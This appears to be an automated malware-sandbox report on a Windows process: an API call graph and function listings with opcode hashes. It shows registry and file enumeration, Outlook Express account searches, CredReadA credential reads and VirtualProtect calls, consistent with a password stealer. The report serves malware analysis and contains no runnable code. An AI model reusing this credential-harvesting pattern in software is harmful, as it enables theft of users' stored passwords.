RegCloseKey 33481->33475 33482 401fd9 atoi 33483 401fef memset memset sprintf 33482->33483 33491 401fc9 33482->33491 33615 410b1e 33483->33615 33486 402165 33486->33481 33487 406f81 GetFileAttributesA 33487->33491 33488 402076 memset memset strlen strlen 33488->33491 33489 4070e3 strlen _mbscat _mbscpy _mbscat 33489->33491 33490 4020dd strlen strlen 33490->33491 33491->33481 33491->33482 33491->33486 33491->33487 33491->33488 33491->33489 33491->33490 33492 402167 _mbscpy 33491->33492 33622 410b62 RegEnumKeyExA 33491->33622 33492->33481 33494 40c422 33493->33494 33495 40c425 _mbscat _mbscpy _mbscpy 33493->33495 33494->33495 33496 40c49d 33495->33496 33497 40c512 33496->33497 33498 40c502 GetWindowPlacement 33496->33498 33499 40c538 33497->33499 33644 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33497->33644 33498->33497 33637 409b31 33499->33637 33503 40ba28 33504 40ba87 33503->33504 33510 40ba3c 33503->33510 33647 406c62 LoadCursorA SetCursor 33504->33647 33506 40ba43 _mbsicmp 33506->33510 33507 40ba8c 33648 4107f1 33507->33648 33651 403c16 33507->33651 33727 410a9c RegOpenKeyExA 33507->33727 33728 404734 33507->33728 33736 404785 33507->33736 33508 40baa0 33509 407e30 _strcmpi 33508->33509 33513 40bab0 33509->33513 33510->33504 33510->33506 33739 40b5e5 10 API calls 33510->33739 33511 40bafa SetCursor 33511->33376 33513->33511 33514 40baf1 qsort 33513->33514 33514->33511 34102 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33520->34102 33522 40b00e 33523 40b016 33522->33523 33524 40b01f GetStdHandle 33522->33524 34103 406d1a CreateFileA 33523->34103 33526 40b01c 33524->33526 33527 40b035 33526->33527 33528 40b12d 33526->33528 34104 406c62 LoadCursorA SetCursor 33527->34104 34108 406d77 9 API calls 33528->34108 33531 40b136 33542 40c580 28 API calls 33531->33542 33532 40b087 33539 40b0a1 33532->33539 34106 40a699 12 API calls 33532->34106 33533 40b042 33533->33532 33533->33539 34105 40a57c strlen WriteFile 33533->34105 33536 40b0d6 33537 40b116 CloseHandle 33536->33537 33538 40b11f SetCursor 33536->33538 33537->33538 33538->33531 33539->33536 34107 406d77 9 API calls 33539->34107 33541->33370 33542->33373 33555 409a32 33543->33555 33546 409c80 memcpy memcpy 33547 409cda 33546->33547 33547->33546 33548 409d18 ??2@YAPAXI ??2@YAPAXI 33547->33548 33552 408db6 12 API calls 33547->33552 33549 409d54 ??2@YAPAXI 33548->33549 33550 409d8b 33548->33550 33549->33550 33565 409b9c 33550->33565 33552->33547 33554 4023c1 33554->33455 33556 409a44 33555->33556 33557 409a3d ??3@YAXPAX 33555->33557 33558 409a52 33556->33558 33559 409a4b ??3@YAXPAX 33556->33559 33557->33556 33560 409a63 33558->33560 33561 409a5c ??3@YAXPAX 33558->33561 33559->33558 33562 409a83 ??2@YAPAXI ??2@YAPAXI 33560->33562 33563 409a73 ??3@YAXPAX 33560->33563 33564 409a7c ??3@YAXPAX 33560->33564 33561->33560 33562->33546 33563->33564 33564->33562 33566 407a55 ??3@YAXPAX 33565->33566 33567 409ba5 33566->33567 33568 407a55 ??3@YAXPAX 33567->33568 33569 409bad 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bb5 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bbd 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bd0 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bda 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409be4 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409bee 33580->33581 33581->33554 33583 410d0e 2 API calls 33582->33583 33584 410dca 33583->33584 33585 410dfd memset 33584->33585 33624 4070ae 33584->33624 33586 410e1d 33585->33586 33627 410a9c RegOpenKeyExA 33586->33627 33590 401e9e strlen strlen 33590->33458 33590->33459 33591 410e4a 33592 410e7f _mbscpy 33591->33592 33628 410d3d _mbscpy 33591->33628 33592->33590 33594 410e5b 33629 410add RegQueryValueExA 33594->33629 33596 410e73 RegCloseKey 33596->33592 33597->33462 33598->33468 33630 410a9c RegOpenKeyExA 33599->33630 33601 401c4c 33602 401cad 33601->33602 33631 410add RegQueryValueExA 33601->33631 33602->33471 33602->33473 33604 401c6a 33605 401c71 strchr 33604->33605 33606 401ca4 RegCloseKey 33604->33606 33605->33606 33607 401c85 strchr 33605->33607 33606->33602 33607->33606 33608 401c94 33607->33608 33632 406f06 strlen 33608->33632 33610 401ca1 33610->33606 33611->33474 33612->33459 33613->33465 33614->33491 33635 410a9c RegOpenKeyExA 33615->33635 33617 410b34 33618 410b5d 33617->33618 33636 410add RegQueryValueExA 33617->33636 33618->33491 33620 410b4c RegCloseKey 33620->33618 33622->33491 33623->33479 33625 4070bd GetVersionExA 33624->33625 33626 4070ce 33624->33626 33625->33626 33626->33585 33626->33590 33627->33591 33628->33594 33629->33596 33630->33601 33631->33604 33633 406f17 33632->33633 33634 406f1a memcpy 33632->33634 33633->33634 33634->33610 33635->33617 33636->33620 33638 409b40 33637->33638 33640 409b4e 33637->33640 33645 409901 memset SendMessageA 33638->33645 33641 409b99 33640->33641 33642 409b8b 33640->33642 33641->33503 33646 409868 SendMessageA 33642->33646 33644->33499 33645->33640 33646->33641 33647->33507 33649 410807 33648->33649 33650 4107fc FreeLibrary 33648->33650 33649->33508 33650->33649 33652 4107f1 FreeLibrary 33651->33652 33653 403c30 LoadLibraryA 33652->33653 33654 403c74 33653->33654 33655 403c44 GetProcAddress 33653->33655 33656 4107f1 FreeLibrary 33654->33656 33655->33654 33657 403c5e 33655->33657 33658 403c7b 33656->33658 33657->33654 33661 403c6b 33657->33661 33659 404734 3 API calls 33658->33659 33660 403c86 33659->33660 33740 4036e5 33660->33740 33661->33658 33664 4036e5 26 API calls 33665 403c9a 33664->33665 33666 4036e5 26 API calls 33665->33666 33667 403ca4 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403cae 33668->33669 33752 4085d2 33669->33752 33677 403ce5 33678 403cf7 33677->33678 33933 402bd1 39 API calls 33677->33933 33798 410a9c RegOpenKeyExA 33678->33798 33681 403d0a 33682 403d1c 33681->33682 33934 402bd1 39 API calls 33681->33934 33799 402c5d 33682->33799 33686 4070ae GetVersionExA 33687 403d31 33686->33687 33817 410a9c RegOpenKeyExA 33687->33817 33689 403d51 33690 403d61 33689->33690 33935 402b22 46 API calls 33689->33935 33818 410a9c RegOpenKeyExA 33690->33818 33693 403d87 33694 403d97 33693->33694 33936 402b22 46 API calls 33693->33936 33819 410a9c RegOpenKeyExA 33694->33819 33697 403dbd 33698 403dcd 33697->33698 33937 402b22 46 API calls 33697->33937 33820 410808 33698->33820 33702 404785 FreeLibrary 33703 403de8 33702->33703 33824 402fdb 33703->33824 33706 402fdb 34 API calls 33707 403e00 33706->33707 33840 4032b7 33707->33840 33716 403e3b 33718 403e73 33716->33718 33719 403e46 _mbscpy 33716->33719 33887 40fb00 33718->33887 33939 40f334 334 API calls 33719->33939 33727->33508 33729 404785 FreeLibrary 33728->33729 33730 40473b LoadLibraryA 33729->33730 33731 40474c GetProcAddress 33730->33731 33734 40476e 33730->33734 33732 404764 33731->33732 33731->33734 33732->33734 33733 404781 33733->33508 33734->33733 33735 404785 FreeLibrary 33734->33735 33735->33733 33737 4047a3 33736->33737 33738 404799 FreeLibrary 33736->33738 33737->33508 33738->33737 33739->33510 33741 4037c5 33740->33741 33742 4036fb 33740->33742 33741->33664 33940 410863 UuidFromStringA UuidFromStringA memcpy 33742->33940 33744 40370e 33744->33741 33745 403716 strchr 33744->33745 33745->33741 33746 403730 33745->33746 33941 4021b6 memset 33746->33941 33748 40373f _mbscpy _mbscpy strlen 33749 4037a4 _mbscpy 33748->33749 33750 403789 sprintf 33748->33750 33942 4023e5 16 API calls 33749->33942 33750->33749 33753 4085e2 33752->33753 33943 4082cd 11 API calls 33753->33943 33757 408600 33758 403cba 33757->33758 33759 40860b memset 33757->33759 33770 40821d 33758->33770 33946 410b62 RegEnumKeyExA 33759->33946 33761 4086d2 RegCloseKey 33761->33758 33763 408637 33763->33761 33764 40865c memset 33763->33764 33947 410a9c RegOpenKeyExA 33763->33947 33950 410b62 RegEnumKeyExA 33763->33950 33948 410add RegQueryValueExA 33764->33948 33767 408694 33949 40848b 10 API calls 33767->33949 33769 4086ab RegCloseKey 33769->33763 33951 410a9c RegOpenKeyExA 33770->33951 33772 40823f 33773 403cc6 33772->33773 33774 408246 memset 33772->33774 33782 4086e0 33773->33782 33952 410b62 RegEnumKeyExA 33774->33952 33776 4082bf RegCloseKey 33776->33773 33778 40826f 33778->33776 33953 410a9c RegOpenKeyExA 33778->33953 33954 4080ed 11 API calls 33778->33954 33955 410b62 RegEnumKeyExA 33778->33955 33781 4082a2 RegCloseKey 33781->33778 33956 4045db 33782->33956 33784 4088ef 33964 404656 33784->33964 33788 408737 wcslen 33788->33784 33794 40876a 33788->33794 33789 40877a _wcsncoll 33789->33794 33791 404734 3 API calls 33791->33794 33792 404785 FreeLibrary 33792->33794 33793 408812 memset 33793->33794 33795 40883c memcpy wcschr 33793->33795 33794->33784 33794->33789 33794->33791 33794->33792 33794->33793 33794->33795 33796 4088c3 LocalFree 33794->33796 33967 40466b _mbscpy 33794->33967 33795->33794 33796->33794 33797 410a9c RegOpenKeyExA 33797->33677 33798->33681 33968 410a9c RegOpenKeyExA 33799->33968 33801 402c7a 33802 402da5 33801->33802 33803 402c87 memset 33801->33803 33802->33686 33969 410b62 RegEnumKeyExA 33803->33969 33805 402d9c RegCloseKey 33805->33802 33806 402cb2 33806->33805 33807 410b1e 3 API calls 33806->33807 33816 402d9a 33806->33816 33973 402bd1 39 API calls 33806->33973 33974 410b62 RegEnumKeyExA 33806->33974 33808 402ce4 memset sprintf 33807->33808 33970 410a9c RegOpenKeyExA 33808->33970 33810 402d28 33811 402d3a sprintf 33810->33811 33971 402bd1 39 API calls 33810->33971 33972 410a9c RegOpenKeyExA 33811->33972 33816->33805 33817->33689 33818->33693 33819->33697 33821 410816 33820->33821 33822 4107f1 FreeLibrary 33821->33822 33823 403ddd 33822->33823 33823->33702 33975 410a9c RegOpenKeyExA 33824->33975 33826 402ff9 33827 403006 memset 33826->33827 33828 40312c 33826->33828 33976 410b62 RegEnumKeyExA 33827->33976 33828->33706 33830 403122 RegCloseKey 33830->33828 33831 410b1e 3 API calls 33832 403058 memset sprintf 33831->33832 33977 410a9c RegOpenKeyExA 33832->33977 33834 4030a2 memset 33978 410b62 RegEnumKeyExA 33834->33978 33835 410b62 RegEnumKeyExA 33839 403033 33835->33839 33837 4030f9 RegCloseKey 33837->33839 33839->33830 33839->33831 33839->33834 33839->33835 33839->33837 33979 402db3 26 API calls 33839->33979 33841 4032d5 33840->33841 33842 4033a9 33840->33842 33980 4021b6 memset 33841->33980 33855 4034e4 memset memset 33842->33855 33844 4032e1 33981 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33844->33981 33846 4032ea 33847 4032f8 memset GetPrivateProfileSectionA 33846->33847 33982 4023e5 16 API calls 33846->33982 33847->33842 33852 40332f 33847->33852 33849 40339b strlen 33849->33842 33849->33852 33851 403350 strchr 33851->33852 33852->33842 33852->33849 33983 4021b6 memset 33852->33983 33984 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33852->33984 33985 4023e5 16 API calls 33852->33985 33856 410b1e 3 API calls 33855->33856 33857 40353f 33856->33857 33858 40357f 33857->33858 33859 403546 _mbscpy 33857->33859 33863 403985 33858->33863 33986 406d55 strlen _mbscat 33859->33986 33861 403565 _mbscat 33987 4033f0 19 API calls 33861->33987 33988 40466b _mbscpy 33863->33988 33867 4039aa 33869 4039ff 33867->33869 33989 40f460 memset memset 33867->33989 34010 40f6e2 33867->34010 34028 4038e8 21 API calls 33867->34028 33870 404785 FreeLibrary 33869->33870 33871 403a0b 33870->33871 33872 4037ca memset memset 33871->33872 34036 444551 memset 33872->34036 33875 4038e2 33875->33716 33938 40f334 334 API calls 33875->33938 33877 40382e 33878 406f06 2 API calls 33877->33878 33879 403843 33878->33879 33880 406f06 2 API calls 33879->33880 33881 403855 strchr 33880->33881 33882 403884 _mbscpy 33881->33882 33883 403897 strlen 33881->33883 33884 4038bf _mbscpy 33882->33884 33883->33884 33885 4038a4 sprintf 33883->33885 34048 4023e5 16 API calls 33884->34048 33885->33884 33888 44b090 33887->33888 33889 40fb10 RegOpenKeyExA 33888->33889 33890 403e7f 33889->33890 33891 40fb3b RegOpenKeyExA 33889->33891 33901 40f96c 33890->33901 33892 40fb55 RegQueryValueExA 33891->33892 33893 40fc2d RegCloseKey 33891->33893 33894 40fc23 RegCloseKey 33892->33894 33895 40fb84 33892->33895 33893->33890 33894->33893 33896 404734 3 API calls 33895->33896 33897 40fb91 33896->33897 33897->33894 33898 40fc19 LocalFree 33897->33898 33899 40fbdd memcpy memcpy 33897->33899 33898->33894 34053 40f802 11 API calls 33899->34053 33902 4070ae GetVersionExA 33901->33902 33903 40f98d 33902->33903 33904 4045db 7 API calls 33903->33904 33912 40f9a9 33904->33912 33905 40fae6 33906 404656 FreeLibrary 33905->33906 33907 403e85 33906->33907 33913 4442ea memset 33907->33913 33908 40fa13 memset WideCharToMultiByte 33909 40fa43 _strnicmp 33908->33909 33908->33912 33910 40fa5b WideCharToMultiByte 33909->33910 33909->33912 33911 40fa88 WideCharToMultiByte 33910->33911 33910->33912 33911->33912 33912->33905 33912->33908 33914 410dbb 9 API calls 33913->33914 33915 444329 33914->33915 34054 40759e strlen strlen 33915->34054 33920 410dbb 9 API calls 33921 444350 33920->33921 33922 40759e 3 API calls 33921->33922 33923 44435a 33922->33923 33924 444212 65 API calls 33923->33924 33925 444366 memset memset 33924->33925 33926 410b1e 3 API calls 33925->33926 33927 4443b9 ExpandEnvironmentStringsA strlen 33926->33927 33928 4443f4 _strcmpi 33927->33928 33929 4443e5 33927->33929 33930 403e91 33928->33930 33931 44440c 33928->33931 33929->33928 33930->33508 33932 444212 65 API calls 33931->33932 33932->33930 33933->33678 33934->33682 33935->33690 33936->33694 33937->33698 33938->33716 33939->33718 33940->33744 33941->33748 33942->33741 33944 40841c 33943->33944 33945 410a9c RegOpenKeyExA 33944->33945 33945->33757 33946->33763 33947->33763 33948->33767 33949->33769 33950->33763 33951->33772 33952->33778 33953->33778 33954->33781 33955->33778 33957 404656 FreeLibrary 33956->33957 33958 4045e3 LoadLibraryA 33957->33958 33959 404651 33958->33959 33960 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33958->33960 33959->33784 33959->33788 33961 40463d 33960->33961 33962 404643 33961->33962 33963 404656 FreeLibrary 33961->33963 33962->33959 33963->33959 33965 403cd2 33964->33965 33966 40465c FreeLibrary 33964->33966 33965->33797 33966->33965 33967->33794 33968->33801 33969->33806 33970->33810 33971->33811 33972->33806 33973->33806 33974->33806 33975->33826 33976->33839 33977->33839 33978->33839 33979->33839 33980->33844 33981->33846 33982->33847 33983->33851 33984->33852 33985->33852 33986->33861 33987->33858 33988->33867 34029 4078ba 33989->34029 33992 4078ba _mbsnbcat 33993 40f5a3 RegOpenKeyExA 33992->33993 33994 40f5c3 RegQueryValueExA 33993->33994 33995 40f6d9 33993->33995 33996 40f6d0 RegCloseKey 33994->33996 33997 40f5f0 33994->33997 33995->33867 33996->33995 33997->33996 33998 40f675 33997->33998 34033 40466b _mbscpy 33997->34033 33998->33996 34034 4012ee strlen 33998->34034 34000 40f611 34002 404734 3 API calls 34000->34002 34007 40f616 34002->34007 34003 40f69e RegQueryValueExA 34003->33996 34004 40f6c1 34003->34004 34004->33996 34005 40f66a 34006 404785 FreeLibrary 34005->34006 34006->33998 34007->34005 34008 40f661 LocalFree 34007->34008 34009 40f645 memcpy 34007->34009 34008->34005 34009->34008 34035 40466b _mbscpy 34010->34035 34012 40f6fa 34013 4045db 7 API calls 34012->34013 34014 40f708 34013->34014 34015 404734 3 API calls 34014->34015 34022 40f7e2 34014->34022 34017 40f715 34015->34017 34016 404656 FreeLibrary 34018 40f7f1 34016->34018 34019 40f71d CredReadA 34017->34019 34017->34022 34020 404785 FreeLibrary 34018->34020 34019->34022 34023 40f734 34019->34023 34021 40f7fc 34020->34021 34021->33867 34022->34016 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33867 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33992 34033->34000 34034->34003 34035->34012 34049 410a9c RegOpenKeyExA 34036->34049 34038 40381a 34038->33875 34047 4021b6 memset 34038->34047 34039 44458b 34039->34038 34050 410add RegQueryValueExA 34039->34050 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34038 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33877 34048->33875 34049->34039 34050->34041 34051->34044 34052->34046 34053->33898 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34099 444196 52 API calls 34062->34099 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34096 407f90 34066->34096 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34092 407e62 34070->34092 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33920 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34100 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34087 407f3f 34083->34087 34085 407f46 strlen strlen 34084->34085 34086 407f3a 34084->34086 34089 407f7f 34085->34089 34090 407f76 34085->34090 34088 407f90 FindClose 34086->34088 34087->34085 34087->34089 34088->34087 34089->34060 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34101 34093 407e6c strcmp 34092->34093 34095 407e94 34092->34095 34094 407e83 strcmp 34093->34094 34093->34095 34094->34095 34095->34070 34097 407fa3 34096->34097 34098 407f99 FindClose 34096->34098 34097->34071 34098->34097 34099->34060 34100->34080 34101->34089 34102->33522 34103->33526 34104->33533 34105->33532 34106->33539 34107->33536 34108->33531 34117 411853 RtlInitializeCriticalSection memset 34118 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34291 40a256 13 API calls 34293 432e5b 17 API calls 34295 43fa5a 20 API calls 34120 401060 41 API calls 34298 427260 CloseHandle memset memset 33196 410c68 FindResourceA 33197 410c81 SizeofResource 33196->33197 33199 410cae 33196->33199 33198 410c92 LoadResource 33197->33198 33197->33199 33198->33199 33200 410ca0 LockResource 33198->33200 33200->33199 34300 405e69 14 API calls 34125 433068 15 API calls __fprintf_l 34302 414a6d 18 API calls 34303 43fe6f 134 API calls 34127 424c6d 15 API calls __fprintf_l 34304 426741 19 API calls 34129 440c70 17 API calls 34130 443c71 44 API calls 34133 427c79 24 API calls 34307 416e7e memset __fprintf_l 34137 42800b 47 API calls 34138 425115 85 API calls __fprintf_l 34310 41960c 61 API calls 34139 43f40c 122 API calls __fprintf_l 34142 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34143 43f81a 20 API calls 34145 414c20 memset memset 34146 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34314 414625 18 API calls 34315 404225 modf 34316 403a26 strlen WriteFile 34318 40422a 12 API calls 34322 427632 memset memset memcpy 34323 40ca30 59 API calls 34324 404235 26 API calls 34147 42ec34 61 API calls __fprintf_l 34148 425115 76 API calls __fprintf_l 34325 425115 77 API calls __fprintf_l 34327 44223a 38 API calls 34154 43183c 112 API calls 34328 44b2c5 _onexit __dllonexit 34333 42a6d2 memcpy __allrem 34156 405cda 65 API calls 34341 43fedc 138 API calls 34342 4116e1 16 API calls __fprintf_l 34159 4244e6 19 API calls 34161 42e8e8 127 API calls __fprintf_l 34162 4118ee RtlLeaveCriticalSection 34347 43f6ec 22 API calls 34164 425115 119 API calls __fprintf_l 33186 410cf3 EnumResourceNamesA 34350 4492f0 memcpy memcpy 34352 43fafa 18 API calls 34354 4342f9 15 API calls __fprintf_l 34165 4144fd 19 API calls 34356 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34357 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34360 443a84 _mbscpy 34362 43f681 17 API calls 34168 404487 22 API calls 34364 415e8c 16 API calls __fprintf_l 34172 411893 RtlDeleteCriticalSection __fprintf_l 34173 41a492 42 API calls 34368 403e96 34 API calls 34369 410e98 memset SHGetPathFromIDList SendMessageA 34175 426741 109 API calls __fprintf_l 34176 4344a2 18 API calls 34177 4094a2 10 API calls 34372 4116a6 15 API calls __fprintf_l 34373 43f6a4 17 API calls 34374 440aa3 20 API calls 34376 427430 45 API calls 34180 4090b0 7 API calls 34181 4148b0 15 API calls 34183 4118b4 RtlEnterCriticalSection 34184 4014b7 CreateWindowExA 34185 40c8b8 19 API calls 34187 4118bf RtlTryEnterCriticalSection 34381 42434a 18 API calls __fprintf_l 34383 405f53 12 API calls 34195 43f956 59 API calls 34197 40955a 17 API calls 34198 428561 36 API calls 34199 409164 7 API calls 34387 404366 19 API calls 34391 40176c ExitProcess 34394 410777 42 API calls 34204 40dd7b 51 API calls 34205 425d7c 16 API calls __fprintf_l 34396 43f6f0 25 API calls 34397 42db01 22 API calls 34206 412905 15 API calls __fprintf_l 34398 403b04 54 API calls 34399 405f04 SetDlgItemTextA GetDlgItemTextA 34400 44b301 ??3@YAXPAX 34403 4120ea 14 API calls 3 library calls 34404 40bb0a 8 API calls 34406 413f11 strcmp 34210 434110 17 API calls __fprintf_l 34213 425115 108 API calls __fprintf_l 34407 444b11 _onexit 34215 425115 76 API calls __fprintf_l 34218 429d19 10 API calls 34410 444b1f __dllonexit 34411 409f20 _strcmpi 34220 42b927 31 API calls 34414 433f26 19 API calls __fprintf_l 34415 44b323 FreeLibrary 34416 427f25 46 API calls 34417 43ff2b 17 API calls 34418 43fb30 19 API calls 34227 414d36 16 API calls 34229 40ad38 7 API calls 34420 433b38 16 API calls __fprintf_l 34421 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34233 426741 21 API calls 34234 40c5c3 125 API calls 34236 43fdc5 17 API calls 34422 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34239 4161cb memcpy memcpy memcpy memcpy 33201 44b3cf 33202 44b3e6 33201->33202 33204 44b454 33201->33204 33202->33204 33208 44b40e 33202->33208 33205 44b405 33205->33204 33206 44b435 VirtualProtect 33205->33206 33206->33204 33207 44b444 VirtualProtect 33206->33207 33207->33204 33209 44b413 33208->33209 33211 44b454 33209->33211 33215 44b42b 33209->33215 33212 44b41c 33212->33211 33213 44b435 VirtualProtect 33212->33213 33213->33211 33214 44b444 VirtualProtect 33213->33214 33214->33211 33216 44b431 33215->33216 33217 44b435 VirtualProtect 33216->33217 33219 44b454 33216->33219 33218 44b444 VirtualProtect 33217->33218 33217->33219 33218->33219 34427 43ffc8 18 API calls 34240 4281cc 15 API calls __fprintf_l 34429 4383cc 110 API calls __fprintf_l 34241 4275d3 41 API calls 34430 4153d3 22 API calls __fprintf_l 34242 444dd7 _XcptFilter 34435 4013de 15 API calls 34437 425115 111 API calls __fprintf_l 34438 43f7db 18 API calls 34441 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34244 4335ee 16 API calls __fprintf_l 34443 429fef 11 API calls 34245 444deb _exit _c_exit 34444 40bbf0 138 API calls 34248 425115 79 API calls __fprintf_l 34448 437ffa 22 API calls 34252 4021ff 14 API calls 34253 43f5fc 149 API calls 34449 40e381 9 API calls 34255 405983 40 API calls 34256 42b186 27 API calls __fprintf_l 34257 427d86 76 API calls 34258 403585 20 API calls 34260 42e58e 18 API calls __fprintf_l 34263 425115 75 API calls __fprintf_l 34265 401592 8 API calls 33187 410b92 33190 410a6b 33187->33190 33189 410bb2 33191 410a77 33190->33191 33192 410a89 GetPrivateProfileIntA 33190->33192 33195 410983 memset _itoa WritePrivateProfileStringA 33191->33195 33192->33189 33194 410a84 33194->33189 33195->33194 34453 434395 16 API calls 34267 441d9c memcmp 34455 43f79b 119 API calls 34268 40c599 43 API calls 34456 426741 87 API calls 34272 4401a6 21 API calls 34274 426da6 memcpy memset memset memcpy 34275 4335a5 15 API calls 34277 4299ab memset memset memcpy memset memset 34278 40b1ab 8 API calls 34461 425115 76 API calls __fprintf_l 34465 4113b2 18 API calls 2 library calls 34469 40a3b8 memset sprintf SendMessageA 33220 410bbc 33223 4109cf 33220->33223 33224 4109dc 33223->33224 33225 410a23 memset GetPrivateProfileStringA 33224->33225 33226 4109ea memset 33224->33226 33231 407646 strlen 33225->33231 33236 4075cd sprintf memcpy 33226->33236 33229 410a0c WritePrivateProfileStringA 33230 410a65 33229->33230 33232 40765a 33231->33232 33234 40765c 33231->33234 33232->33230 33233 4076a3 33233->33230 33234->33233 33237 40737c strtoul 33234->33237 33236->33229 33237->33234 34280 40b5bf memset memset _mbsicmp

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040832F
                                                                                  • memset.MSVCRT ref: 00408343
                                                                                  • memset.MSVCRT ref: 0040835F
                                                                                  • memset.MSVCRT ref: 00408376
                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                  • strlen.MSVCRT ref: 004083E9
                                                                                  • strlen.MSVCRT ref: 004083F8
                                                                                  • memcpy.MSVCRT ref: 0040840A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                  • API String ID: 1832431107-3760989150
                                                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                  • strlen.MSVCRT ref: 00407F5C
                                                                                  • strlen.MSVCRT ref: 00407F64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                  • String ID: ACD
                                                                                  • API String ID: 379999529-620537770
                                                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00401E8B
                                                                                  • strlen.MSVCRT ref: 00401EA4
                                                                                  • strlen.MSVCRT ref: 00401EB2
                                                                                  • strlen.MSVCRT ref: 00401EF8
                                                                                  • strlen.MSVCRT ref: 00401F06
                                                                                  • memset.MSVCRT ref: 00401FB1
                                                                                  • atoi.MSVCRT ref: 00401FE0
                                                                                  • memset.MSVCRT ref: 00402003
                                                                                  • sprintf.MSVCRT ref: 00402030
